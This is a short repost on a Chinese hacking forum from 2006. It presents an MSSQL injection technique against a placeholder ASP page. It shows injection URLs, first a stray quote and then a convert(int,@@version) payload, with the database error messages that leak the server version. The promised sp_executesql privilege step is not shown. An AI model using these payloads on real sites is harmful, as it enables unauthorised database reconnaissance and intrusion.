[转载]另类的mssql注入技巧

neokee

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 122
精华: 0
积分: 3199
阅读权限: 100
性别: 男
在线时间: 365 小时
注册时间: 2006-1-25
最后登录: 2008-9-13

发短消息
加为好友
当前离线

楼主大中小发表于 2006-3-9 03:52 只看该作者

[转载]另类的mssql注入技巧

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

利用exec sp_executesql 的漏洞跨权限，思路值得参考：
EXAMPLE TO USE:
http://www.xxxx.com/FullStory.asp?id=1

Exploiting the hole:
http://www.xxxx.com/FullStory.asp?id=1'

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\

VERSION
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Code:

[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright

www.dirshell.com/thenines

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]另类的mssql注入技巧